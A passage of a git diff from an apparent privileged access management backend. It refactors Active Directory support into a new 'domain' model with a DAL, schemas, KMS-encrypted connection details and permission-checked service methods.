TActiveDirectoryDiscoverySourceRunProgress }); - // Auto-import AD Server resource - const { resource: adServerResource, isNew: isAdServerNew } = await pamResourceDAL.transaction(async (tx) => { - const result = await upsertAdServerResource( - projectId, - configuration, - gatewayId, - kmsService, - pamResourceDAL, - tx - ); - - await pamDiscoverySourceResourcesDAL.upsertJunction( - { - discoverySourceId, - resourceId: result.resource.id, - lastDiscoveredRunId: run.id - }, - tx - ); - + // Auto-import AD domain + const { domain } = await pamDomainDAL.transaction(async (tx) => { + const result = await upsertDomain(projectId, configuration, gatewayId, kmsService, pamDomainDAL, tx); return result; }); - resourcesDiscoveredCount += 1; - if (isAdServerNew) newResourcesCount += 1; // Auto-import Windows Server resources and build mapping for local account discovery const computerResourceMap = new Map(); // objectGUID -> resourceId @@ -1019,7 +1013,8 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< const result = await upsertWindowsServerResource( projectId, computer, - adServerResource.id, + domain.id, + configuration.domainFQDN, gatewayId, { winrmPort: configuration.winrmPort, @@ -1066,7 +1061,8 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< const result = await upsertDomainAccount( projectId, user, - adServerResource.id, + domain.id, + configuration.domainFQDN, kmsService, pamAccountDAL, tx @@ -1129,6 +1125,7 @@ export const activeDirectoryDiscoveryFactory: TPamDiscoveryFactory< projectId, localUser, computer.objectGUID, + configuration.domainFQDN, windowsResourceId, kmsService, pamAccountDAL, diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts b/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts index 4c6a12110e2..1c39e3136e6 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-factory.ts @@ -14,6 +14,7 @@ import { TPamDiscoveryCredentials, TPamDiscoveryFactory } from "@app/ee/services/pam-discovery/pam-discovery-types"; +import { TPamDomainDALFactory } from "@app/ee/services/pam-domain/pam-domain-dal"; import { TPamResourceDALFactory } from "@app/ee/services/pam-resource/pam-resource-dal"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; @@ -27,6 +28,7 @@ export type TPamDiscoveryScanDeps = { "upsertJunction" | "markStaleForRun" >; pamAccountDependenciesDAL: Pick; + pamDomainDAL: Pick; pamResourceDAL: Pick; pamAccountDAL: Pick; kmsService: Pick; diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts b/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts index ae4cc4d87da..fe6979c2d68 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-queue.ts @@ -5,6 +5,7 @@ import { JOB_SCHEDULER_PREFIX, QueueJobs, QueueName, TQueueServiceFactory } from import { TKmsServiceFactory } from "@app/services/kms/kms-service"; import { TPamAccountDALFactory } from "../pam-account/pam-account-dal"; +import { TPamDomainDALFactory } from "../pam-domain/pam-domain-dal"; import { TPamResourceDALFactory } from "../pam-resource/pam-resource-dal"; import { TPamAccountDependenciesDALFactory } from "./pam-account-dependencies-dal"; import { PamDiscoverySourceRunTrigger, PamDiscoveryType } from "./pam-discovery-enums"; @@ -27,6 +28,7 @@ type TPamDiscoveryQueueFactoryDep = { "upsertJunction" | "markStaleForRun" >; pamAccountDependenciesDAL: Pick; + pamDomainDAL: Pick; pamResourceDAL: Pick; pamAccountDAL: Pick; kmsService: Pick; @@ -44,6 +46,7 @@ export const pamDiscoveryQueueFactory = ({ pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService, @@ -92,6 +95,7 @@ export const pamDiscoveryQueueFactory = ({ pamDiscoverySourceAccountsDAL, pamDiscoverySourceDependenciesDAL, pamAccountDependenciesDAL, + pamDomainDAL, pamResourceDAL, pamAccountDAL, kmsService, diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts b/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts index 1d5ddbb862b..541b6609a3d 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-schemas.ts @@ -8,12 +8,13 @@ import { } from "@app/db/schemas"; import { slugSchema } from "@app/server/lib/schemas"; -import { ActiveDirectoryAccountMetadataSchema } from "../pam-resource/active-directory/active-directory-resource-schemas"; +import { ActiveDirectoryAccountMetadataSchema } from "../pam-domain/active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "../pam-domain/pam-domain-enums"; import { PamResource } from "../pam-resource/pam-resource-enums"; -import { SSHResourceInternalMetadataSchema } from "../pam-resource/ssh/ssh-resource-schemas"; +import { SanitizedSSHResourceInternalMetadataSchema } from "../pam-resource/ssh/ssh-resource-schemas"; import { - WindowsAccountMetadataSchema, - WindowsResourceInternalMetadataSchema + SanitizedWindowsResourceInternalMetadataSchema, + WindowsAccountMetadataSchema } from "../pam-resource/windows-server/windows-server-resource-schemas"; import { PamDiscoverySchedule, @@ -57,15 +58,18 @@ export const DiscoveredResourceSchema = PamDiscoverySourceResourcesSchema.extend resourceName: z.string(), resourceType: z.nativeEnum(PamResource), resourceInternalMetadata: z - .union([SSHResourceInternalMetadataSchema, WindowsResourceInternalMetadataSchema]) + .union([SanitizedSSHResourceInternalMetadataSchema, SanitizedWindowsResourceInternalMetadataSchema]) .optional(), dependencyCount: z.number().default(0) }); export const DiscoveredAccountSchema = PamDiscoverySourceAccountsSchema.extend({ - resourceType: z.nativeEnum(PamResource), - resourceName: z.string(), - resourceId: z.string().uuid(), + resourceType: z.nativeEnum(PamResource).nullable().optional(), + resourceName: z.string().nullable().optional(), + resourceId: z.string().uuid().nullable().optional(), + domainType: z.nativeEnum(PamDomainType).nullable().optional(), + domainName: z.string().nullable().optional(), + domainId: z.string().uuid().nullable().optional(), accountName: z.string(), internalMetadata: z.union([ActiveDirectoryAccountMetadataSchema, WindowsAccountMetadataSchema]), dependencyCount: z.number().default(0) diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts b/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts index f0c9e508cae..8160e25833d 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-source-accounts-dal.ts @@ -21,7 +21,8 @@ export const pamDiscoverySourceAccountsDALFactory = (db: TDbClient) => { const dbInstance = tx || db.replicaNode(); const query = dbInstance(TableName.PamDiscoverySourceAccount) .join(TableName.PamAccount, `${TableName.PamDiscoverySourceAccount}.accountId`, `${TableName.PamAccount}.id`) - .join(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamResource, `${TableName.PamAccount}.resourceId`, `${TableName.PamResource}.id`) + .leftJoin(TableName.PamDomain, `${TableName.PamAccount}.domainId`, `${TableName.PamDomain}.id`) .where(`${TableName.PamDiscoverySourceAccount}.discoverySourceId`, discoverySourceId); const countQuery = query.clone().count("*", { as: "count" }).first(); @@ -30,9 +31,12 @@ export const pamDiscoverySourceAccountsDALFactory = (db: TDbClient) => { selectAllTableCols(TableName.PamDiscoverySourceAccount), db.ref("name").withSchema(TableName.PamAccount).as("accountName"), db.ref("resourceId").withSchema(TableName.PamAccount).as("resourceId"), + db.ref("domainId").withSchema(TableName.PamAccount).as("domainId"), db.ref("resourceType").withSchema(TableName.PamResource).as("resourceType"), + db.ref("domainType").withSchema(TableName.PamDomain).as("domainType"), db.ref("internalMetadata").withSchema(TableName.PamAccount).as("internalMetadata"), - db.ref("name").withSchema(TableName.PamResource).as("resourceName") + db.ref("name").withSchema(TableName.PamResource).as("resourceName"), + db.ref("name").withSchema(TableName.PamDomain).as("domainName") ); void query.orderBy(`${TableName.PamAccount}.name`, "asc"); diff --git a/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts b/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts index f79b1970700..fae4bc71e1d 100644 --- a/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts +++ b/backend/src/ee/services/pam-discovery/pam-discovery-source-service.ts @@ -76,7 +76,7 @@ type TPamDiscoverySourceServiceFactoryDep = { | "updateById" | "deleteById" >; - pamAccountDAL: Pick; + pamAccountDAL: Pick; pamResourceDAL: Pick; permissionService: Pick; kmsService: Pick; @@ -632,32 +632,38 @@ export const pamDiscoverySourceServiceFactory = ({ actorAuthMethod: ActorAuthMethod, actorOrgId: string ) => { - const accountWithResource = await pamAccountDAL.findByIdWithResourceDetails(accountId); - if (!accountWithResource) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); + const accountWithParent = await pamAccountDAL.findByIdWithParentDetails(accountId); + if (!accountWithParent) throw new NotFoundError({ message: `Account with ID '${accountId}' not found` }); const { permission } = await permissionService.getProjectPermission({ actor, actorId, - projectId: accountWithResource.projectId, + projectId: accountWithParent.projectId, actorAuthMethod, actorOrgId, actionProjectType: ActionProjectType.PAM }); - const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithResource.id]); - const accountMetadata = metadataByAccountId[accountWithResource.id] || []; + const metadataByAccountId = await pamAccountDAL.findMetadataByAccountIds([accountWithParent.id]); + const accountMetadata = metadataByAccountId[accountWithParent.id] || []; ForbiddenError.from(permission).throwUnlessCan( action, subject(ProjectPermissionSub.PamAccounts, { - resourceName: accountWithResource.resource.name, - accountName: accountWithResource.name, - resourceType: accountWithResource.resource.resourceType, + accountName: accountWithParent.name, + ...(accountWithParent.resource && { + resourceName: accountWithParent.resource.name, + resourceType: accountWithParent.resource.resourceType + }), + ...(accountWithParent.domain && { + domainName: accountWithParent.domain.name, + domainType: accountWithParent.domain.domainType + }), metadata: accountMetadata }) ); - return accountWithResource; + return accountWithParent; }; const decryptDependencySyncMessages = async ( @@ -697,7 +703,7 @@ export const pamDiscoverySourceServiceFactory = ({ actorAuthMethod: ActorAuthMethod; actorOrgId: string; }) => { - const accountWithResource = await verifyAccountPermission( + const accountWithParent = await verifyAccountPermission( accountId, ProjectPermissionPamAccountActions.Read, actor, @@ -706,7 +712,7 @@ export const pamDiscoverySourceServiceFactory = ({ actorOrgId ); const deps = await pamAccountDependenciesDAL.findByAccountId(accountId); - return decryptDependencySyncMessages(deps, accountWithResource.projectId); + return decryptDependencySyncMessages(deps, accountWithParent.projectId); }; const getResourceDependencies = async ({ diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-enums.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-enums.ts similarity index 100% rename from backend/src/ee/services/pam-resource/active-directory/active-directory-resource-enums.ts rename to backend/src/ee/services/pam-domain/active-directory/active-directory-domain-enums.ts diff --git a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-factory.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-factory.ts similarity index 90% rename from backend/src/ee/services/pam-resource/active-directory/active-directory-resource-factory.ts rename to backend/src/ee/services/pam-domain/active-directory/active-directory-domain-factory.ts index d852809a8f7..2f3f8caff65 100644 --- a/backend/src/ee/services/pam-resource/active-directory/active-directory-resource-factory.ts +++ b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-factory.ts @@ -7,27 +7,23 @@ import { logger } from "@app/lib/logger"; import { verifyHostInputValidity } from "../../dynamic-secret/dynamic-secret-fns"; import { TGatewayV2ServiceFactory } from "../../gateway-v2/gateway-v2-service"; -import { generatePassword } from "../../secret-rotation-v2/shared/utils"; -import { PamResource } from "../pam-resource-enums"; +import { PamResource } from "../../pam-resource/pam-resource-enums"; import { - TPamResourceFactory, TPamResourceFactoryRotateAccountCredentials, TPamResourceFactoryValidateAccountCredentials, - TPamResourceInternalMetadata, TPostRotateContext -} from "../pam-resource-types"; -import { syncDependenciesAfterRotation } from "../shared/dependency-sync-fns"; -import { resolveDnsTcp } from "../shared/dns-over-dc"; -import { - TActiveDirectoryAccountCredentials, - TActiveDirectoryResourceConnectionDetails -} from "./active-directory-resource-types"; +} from "../../pam-resource/pam-resource-types"; +import { syncDependenciesAfterRotation } from "../../pam-resource/shared/dependency-sync-fns"; +import { resolveDnsTcp } from "../../pam-resource/shared/dns-over-dc"; +import { generatePassword } from "../../secret-rotation-v2/shared/utils"; +import { TPamDomainFactory } from "../pam-domain-types"; +import { TActiveDirectoryAccountCredentials, TActiveDirectoryConnectionDetails } from "./active-directory-domain-types"; const EXTERNAL_REQUEST_TIMEOUT = 10 * 1000; const executeWithGateway = async ( config: { - connectionDetails: TActiveDirectoryResourceConnectionDetails; + connectionDetails: TActiveDirectoryConnectionDetails; resourceType: PamResource; gatewayId: string; targetPortOverride?: number; @@ -64,11 +60,11 @@ const executeWithGateway = async ( ); }; -export const activeDirectoryResourceFactory: TPamResourceFactory< - TActiveDirectoryResourceConnectionDetails, - TActiveDirectoryAccountCredentials, - TPamResourceInternalMetadata -> = (resourceType, connectionDetails, gatewayId, gatewayV2Service) => { +export const activeDirectoryDomainFactory: TPamDomainFactory< + TActiveDirectoryConnectionDetails, + TActiveDirectoryAccountCredentials +> = (domainType, connectionDetails, gatewayId, gatewayV2Service) => { + const resourceType = domainType as unknown as PamResource; const ldapProtocol = connectionDetails.useLdaps ? "ldaps" : "ldap"; const buildLdapTlsOptions = () => { @@ -113,15 +109,18 @@ export const activeDirectoryResourceFactory: TPamResourceFactory< if (clientError) return; if (err) { - // Even if anonymous bind is rejected, an LDAP error response means the server is an LDAP server - // Only reject if it's a connection-level error (not an LDAP protocol error) + // Connection-level errors mean the server is unreachable + // Any other LDAP error (e.g. InvalidCredentialsError) means the server responded with a protocol-level rejection if (err.name === "ConnectionError" || err.name === "TimeoutError") { client.unbind(); reject(err); - } else { - logger.info("[Active Directory Resource Factory] LDAP connection validated (server responded)"); + } else if ("lde_message" in err) { + logger.info("[Active Directory Domain Factory] LDAP connection validated (server responded)"); client.unbind(); resolve(); + } else { + client.unbind(); + reject(err); } } else { logger.info("[Active Directory Resource Factory] LDAP anonymous bind successful"); @@ -238,7 +237,7 @@ export const activeDirectoryResourceFactory: TPamResourceFactory< // Search for target user's DN by sAMAccountName const searchBase = connectionDetails.domain .split(".") - .map((dc) => `DC=${dc}`) + .map((dc: string) => `DC=${dc}`) .join(","); client.search( diff --git a/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-schemas.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-schemas.ts new file mode 100644 index 00000000000..14629f16cd6 --- /dev/null +++ b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-schemas.ts @@ -0,0 +1,72 @@ +import { z } from "zod"; + +import { + BaseCreatePamAccountSchema, + BasePamAccountSchema, + BasePamAccountSchemaWithResource, + BaseUpdatePamAccountSchema +} from "../../pam-resource/pam-resource-schemas"; +import { PamDomainType } from "../pam-domain-enums"; +import { ActiveDirectoryAccountType } from "./active-directory-domain-enums"; + +export const ActiveDirectoryConnectionDetailsSchema = z.object({ + domain: z.string().trim().min(1).max(255), + dcAddress: z.string().trim().min(1).max(255), + port: z.coerce.number().int().min(1).max(65535), + useLdaps: z.boolean(), + ldapRejectUnauthorized: z.boolean(), + ldapCaCert: z + .string() + .trim() + .transform((val) => val || undefined) + .optional(), + ldapTlsServerName: z + .string() + .trim() + .transform((val) => val || undefined) + .optional() +}); + +export const ActiveDirectoryAccountCredentialsSchema = z.object({ + username: z.string().trim().min(1).max(255), + password: z.string().trim().min(1).max(255) +}); + +export const ActiveDirectoryAccountMetadataSchema = z.object({ + accountType: z.nativeEnum(ActiveDirectoryAccountType), + adGuid: z.string().optional(), + displayName: z.string().optional(), + userPrincipalName: z.string().optional(), + servicePrincipalName: z.string().array().optional(), + userAccountControl: z.number().optional(), + passwordLastSet: z.string().optional(), + lastLogon: z.string().optional() +}); + +export const ActiveDirectoryAccountSchema = BasePamAccountSchema.extend({ + credentials: ActiveDirectoryAccountCredentialsSchema, + internalMetadata: ActiveDirectoryAccountMetadataSchema +}); + +export const CreateActiveDirectoryAccountSchema = BaseCreatePamAccountSchema.omit({ resourceId: true }).extend({ + domainId: z.string().uuid(), + credentials: ActiveDirectoryAccountCredentialsSchema, + internalMetadata: ActiveDirectoryAccountMetadataSchema +}); + +export const UpdateActiveDirectoryAccountSchema = BaseUpdatePamAccountSchema.extend({ + credentials: ActiveDirectoryAccountCredentialsSchema.optional(), + internalMetadata: ActiveDirectoryAccountMetadataSchema.optional() +}); + +export const SanitizedActiveDirectoryAccountWithDomainSchema = BasePamAccountSchemaWithResource.extend({ + parentType: z.literal(PamDomainType.ActiveDirectory), + credentials: z.object({ + username: z.string() + }), + internalMetadata: ActiveDirectoryAccountMetadataSchema +}); + +export const ActiveDirectorySessionCredentialsSchema = ActiveDirectoryConnectionDetailsSchema.and( + ActiveDirectoryAccountCredentialsSchema +); diff --git a/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-types.ts b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-types.ts new file mode 100644 index 00000000000..113bc4e95ab --- /dev/null +++ b/backend/src/ee/services/pam-domain/active-directory/active-directory-domain-types.ts @@ -0,0 +1,12 @@ +import { z } from "zod"; + +import { + ActiveDirectoryAccountCredentialsSchema, + ActiveDirectoryAccountMetadataSchema, + ActiveDirectoryConnectionDetailsSchema +} from "./active-directory-domain-schemas"; + +export type TActiveDirectoryConnectionDetails = z.infer; + +export type TActiveDirectoryAccountCredentials = z.infer; +export type TActiveDirectoryAccountInternalMetadata = z.infer; diff --git a/backend/src/ee/services/pam-domain/pam-domain-dal.ts b/backend/src/ee/services/pam-domain/pam-domain-dal.ts new file mode 100644 index 00000000000..c773cad1567 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-dal.ts @@ -0,0 +1,119 @@ +import { Knex } from "knex"; +import RE2 from "re2"; + +import { TDbClient } from "@app/db"; +import { TableName } from "@app/db/schemas"; +import { DatabaseError } from "@app/lib/errors"; +import { ormify, selectAllTableCols } from "@app/lib/knex"; +import { OrderByDirection } from "@app/lib/types"; + +import { PamDomainOrderBy } from "./pam-domain-enums"; + +export type TPamDomainDALFactory = ReturnType; + +export const pamDomainDALFactory = (db: TDbClient) => { + const orm = ormify(db, TableName.PamDomain); + + const findById = async (id: string, tx?: Knex) => { + try { + const result = await (tx || db.replicaNode())(TableName.PamDomain) + .leftJoin(TableName.GatewayV2, `${TableName.PamDomain}.gatewayId`, `${TableName.GatewayV2}.id`) + .where(`${TableName.PamDomain}.id`, id) + .select(selectAllTableCols(TableName.PamDomain)) + .select( + db.ref("name").withSchema(TableName.GatewayV2).as("gatewayName"), + db.ref("identityId").withSchema(TableName.GatewayV2).as("gatewayIdentityId") + ) + .first(); + + return result || null; + } catch (error) { + throw new DatabaseError({ error, name: "Find PAM domain by ID" }); + } + }; + + const findByProjectId = async ( + { + projectId, + search, + limit, + offset = 0, + orderBy = PamDomainOrderBy.Name, + orderDirection = OrderByDirection.ASC, + filterDomainTypes, + discoveryFingerprint + }: { + projectId: string; + search?: string; + limit?: number; + offset?: number; + orderBy?: PamDomainOrderBy; + orderDirection?: OrderByDirection; + filterDomainTypes?: string[]; + discoveryFingerprint?: string; + }, + tx?: Knex + ) => { + try { + const dbInstance = tx || db.replicaNode(); + const query = dbInstance(TableName.PamDomain).where(`${TableName.PamDomain}.projectId`, projectId); + + if (search) { + const escapedSearch = search + .replace(new RE2(/\\/g), "\\\\") + .replace(new RE2(/%/g), "\\%") + .replace(new RE2(/_/g), "\\_"); + const pattern = `%${escapedSearch}%`; + void query.whereRaw(`??.?? ILIKE ? ESCAPE '\\'`, [TableName.PamDomain, "name", pattern]); + } + + if (filterDomainTypes && filterDomainTypes.length) { + void query.whereIn(`${TableName.PamDomain}.domainType`, filterDomainTypes); + } + + if (discoveryFingerprint) { + void query.where(`${TableName.PamDomain}.discoveryFingerprint`, discoveryFingerprint); + } + + const countQuery = query.clone().count("*", { as: "count" }).first(); + + void query.select(selectAllTableCols(TableName.PamDomain)); + + const direction = orderDirection === OrderByDirection.ASC ? "ASC" : "DESC"; + void query.orderByRaw(`${TableName.PamDomain}.?? COLLATE "en-x-icu" ${direction}`, [orderBy]); + + if (typeof limit === "number") { + void query.limit(limit).offset(offset); + } + + const [results, countResult] = await Promise.all([query, countQuery]); + const totalCount = Number(countResult?.count || 0); + + return { domains: results, totalCount }; + } catch (error) { + throw new DatabaseError({ error, name: "Find PAM domains by project" }); + } + }; + + const findMetadataByDomainIds = async (domainIds: string[], tx?: Knex) => { + if (!domainIds.length) return {}; + const rows = await (tx || db.replicaNode())(TableName.ResourceMetadata) + .select("id", "key", "value", "pamDomainId") + .whereIn("pamDomainId", domainIds); + const byDomainId: Record> = {}; + for (const row of rows) { + if (row.pamDomainId) { + if (!byDomainId[row.pamDomainId]) byDomainId[row.pamDomainId] = []; + byDomainId[row.pamDomainId].push({ id: row.id, key: row.key, value: row.value || "" }); + } + } + return byDomainId; + }; + + return { + ...orm, + findById, + findByProjectId, + findMetadataByDomainIds + }; +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-enums.ts b/backend/src/ee/services/pam-domain/pam-domain-enums.ts new file mode 100644 index 00000000000..03fcd18cad1 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-enums.ts @@ -0,0 +1,7 @@ +export enum PamDomainType { + ActiveDirectory = "active-directory" +} + +export enum PamDomainOrderBy { + Name = "name" +} diff --git a/backend/src/ee/services/pam-domain/pam-domain-factory.ts b/backend/src/ee/services/pam-domain/pam-domain-factory.ts new file mode 100644 index 00000000000..1ab6a8a2e3e --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-factory.ts @@ -0,0 +1,10 @@ +import { TPamAccountCredentials } from "../pam-resource/pam-resource-types"; +import { activeDirectoryDomainFactory } from "./active-directory/active-directory-domain-factory"; +import { PamDomainType } from "./pam-domain-enums"; +import { TPamDomainConnectionDetails, TPamDomainFactory } from "./pam-domain-types"; + +type TPamDomainFactoryImplementation = TPamDomainFactory; + +export const PAM_DOMAIN_FACTORY_MAP: Record = { + [PamDomainType.ActiveDirectory]: activeDirectoryDomainFactory as TPamDomainFactoryImplementation +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-fns.ts b/backend/src/ee/services/pam-domain/pam-domain-fns.ts new file mode 100644 index 00000000000..bd2d4b40327 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-fns.ts @@ -0,0 +1,46 @@ +import { TKmsServiceFactory } from "@app/services/kms/kms-service"; +import { KmsDataKey } from "@app/services/kms/kms-types"; + +import { TPamDomainConnectionDetails } from "./pam-domain-types"; + +export const encryptDomainConnectionDetails = async ({ + projectId, + connectionDetails, + kmsService +}: { + projectId: string; + connectionDetails: TPamDomainConnectionDetails; + kmsService: Pick; +}) => { + const { encryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const { cipherTextBlob } = encryptor({ + plainText: Buffer.from(JSON.stringify(connectionDetails)) + }); + + return cipherTextBlob; +}; + +export const decryptDomainConnectionDetails = async ({ + projectId, + encryptedConnectionDetails, + kmsService +}: { + projectId: string; + encryptedConnectionDetails: Buffer; + kmsService: Pick; +}) => { + const { decryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.SecretManager, + projectId + }); + + const decryptedPlainTextBlob = decryptor({ + cipherTextBlob: encryptedConnectionDetails + }); + + return JSON.parse(decryptedPlainTextBlob.toString()) as TPamDomainConnectionDetails; +}; diff --git a/backend/src/ee/services/pam-domain/pam-domain-schemas.ts b/backend/src/ee/services/pam-domain/pam-domain-schemas.ts new file mode 100644 index 00000000000..40d9378337e --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-schemas.ts @@ -0,0 +1,55 @@ +import { z } from "zod"; + +import { PamDomainsSchema, ResourceMetadataSchema } from "@app/db/schemas"; +import { slugSchema } from "@app/server/lib/schemas"; +import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; + +import { ActiveDirectoryConnectionDetailsSchema } from "./active-directory/active-directory-domain-schemas"; +import { PamDomainType } from "./pam-domain-enums"; + +export const BasePamDomainSchema = PamDomainsSchema.omit({ + encryptedConnectionDetails: true, + domainType: true +}).extend({ + metadata: ResourceMetadataSchema.pick({ id: true, key: true, value: true }).array().optional() +}); + +export const ActiveDirectoryDomainListItemSchema = z.object({ + name: z.literal("Active Directory"), + domain: z.literal(PamDomainType.ActiveDirectory) +}); + +const BaseActiveDirectoryDomainSchema = BasePamDomainSchema.extend({ + domainType: z.literal(PamDomainType.ActiveDirectory) +}); + +export const ActiveDirectoryDomainSchema = BaseActiveDirectoryDomainSchema.extend({ + connectionDetails: ActiveDirectoryConnectionDetailsSchema +}); + +export const SanitizedActiveDirectoryDomainSchema = BaseActiveDirectoryDomainSchema.extend({ + connectionDetails: ActiveDirectoryConnectionDetailsSchema +}); + +const CoreCreatePamDomainSchema = z.object({ + projectId: z.string().uuid(), + name: slugSchema({ field: "name" }), + metadata: ResourceMetadataNonEncryptionSchema.optional() +}); + +export const CreateActiveDirectoryDomainSchema = CoreCreatePamDomainSchema.extend({ + gatewayId: z.string().uuid(), + connectionDetails: ActiveDirectoryConnectionDetailsSchema +}); + +const CoreUpdatePamDomainSchema = z.object({ + name: slugSchema({ field: "name" }).optional(), + metadata: ResourceMetadataNonEncryptionSchema.optional() +}); + +export const UpdateActiveDirectoryDomainSchema = CoreUpdatePamDomainSchema.extend({ + gatewayId: z.string().uuid().optional(), + connectionDetails: ActiveDirectoryConnectionDetailsSchema.optional() +}); + +export const SanitizedDomainSchema = z.discriminatedUnion("domainType", [SanitizedActiveDirectoryDomainSchema]); diff --git a/backend/src/ee/services/pam-domain/pam-domain-service.ts b/backend/src/ee/services/pam-domain/pam-domain-service.ts new file mode 100644 index 00000000000..bdeeda3a192 --- /dev/null +++ b/backend/src/ee/services/pam-domain/pam-domain-service.ts @@ -0,0 +1,419 @@ +import { ForbiddenError, subject } from "@casl/ability"; + +import { ActionProjectType, TPamDomains } from "@app/db/schemas"; +import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; +import { DatabaseErrorCode } from "@app/lib/error-codes"; +import { BadRequestError, DatabaseError, NotFoundError } from "@app/lib/errors"; +import { OrgServiceActor } from "@app/lib/types"; + +import { decryptAccountCredentials } from "../pam-account/pam-account-fns"; +import { decryptResourceConnectionDetails } from "../pam-resource/pam-resource-fns"; +import { TWindowsResource } from "../pam-resource/windows-server/windows-server-resource-types"; +import { PamDomainType } from "./pam-domain-enums"; +import { PAM_DOMAIN_FACTORY_MAP } from "./pam-domain-factory"; +import { decryptDomainConnectionDetails, encryptDomainConnectionDetails } from "./pam-domain-fns"; +import { + TCreateDomainDTO, + TListDomainsDTO, + TPamDomain, + TPamDomainServiceFactoryDep, + TUpdateDomainDTO +} from "./pam-domain-types"; + +export type TPamDomainServiceFactory = ReturnType; + +const decryptDomain = async ( + domain: TPamDomains, + projectId: string, + kmsService: TPamDomainServiceFactoryDep["kmsService"] +): Promise => { + const connectionDetails = await decryptDomainConnectionDetails({ + encryptedConnectionDetails: domain.encryptedConnectionDetails, + projectId, + kmsService + }); + + return { + ...domain, + domainType: domain.domainType as PamDomainType, + connectionDetails + } as TPamDomain; +}; + +export const pamDomainServiceFactory = ({ + pamDomainDAL, + pamResourceDAL, + permissionService, + kmsService, + gatewayV2Service, + resourceMetadataDAL +}: TPamDomainServiceFactoryDep) => { + const getById = async (id: string, domainType: PamDomainType, actor: OrgServiceActor) => { + const domain = await pamDomainDAL.findById(id); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${id}' not found` }); + + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId: domain.projectId, + actionProjectType: ActionProjectType.PAM + }); + + const metadataByDomainId = await pamDomainDAL.findMetadataByDomainIds([domain.id]); + const domainMetadata = metadataByDomainId[domain.id] || []; + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Read, + subject(ProjectPermissionSub.PamDomains, { + name: domain.name, + domainType: domain.domainType, + metadata: domainMetadata + }) + ); + + if (domain.domainType !== domainType) { + throw new BadRequestError({ + message: `Domain with ID '${id}' is not of type '${domainType}'` + }); + } + + return { + ...(await decryptDomain(domain, domain.projectId, kmsService)), + metadata: domainMetadata + }; + }; + + const create = async ( + { domainType, connectionDetails, gatewayId, name, projectId, metadata }: TCreateDomainDTO, + actor: OrgServiceActor + ) => { + const { permission } = await permissionService.getProjectPermission({ + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorId: actor.id, + actorOrgId: actor.orgId, + projectId, + actionProjectType: ActionProjectType.PAM + }); + + ForbiddenError.from(permission).throwUnlessCan( + ProjectPermissionActions.Create, + subject(ProjectPermissionSub.PamDomains, { + name, + domainType, + metadata: (metadata || []).map(({ key, value }) => ({ key, value: value ?? "" })) + }) + ); + + const existingDomain = await pamDomainDAL.findOne({ name, projectId }); + if (existingDomain) { + throw new BadRequestError({ + message: `Domain with name '${name}' already exists in this project` + }); + } + + const factory = PAM_DOMAIN_FACTORY_MAP[domainType]( + domainType, + connectionDetails, + gatewayId, + gatewayV2Service, + projectId + ); + + const validatedConnectionDetails = await factory.validateConnection(); + const encryptedConnectionDetails = await encryptDomainConnectionDetails({ + connectionDetails: validatedConnectionDetails, + projectId, + kmsService + }); + + try { + const { domain: newDomain, insertedMetadata } = await pamDomainDAL.transaction(async (tx) => { + const created = await pamDomainDAL.create( + { + domainType, + encryptedConnectionDetails, + gatewayId, + name, + projectId + }, + tx + ); + let metadataRows: Awaited> | undefined; + if (metadata && 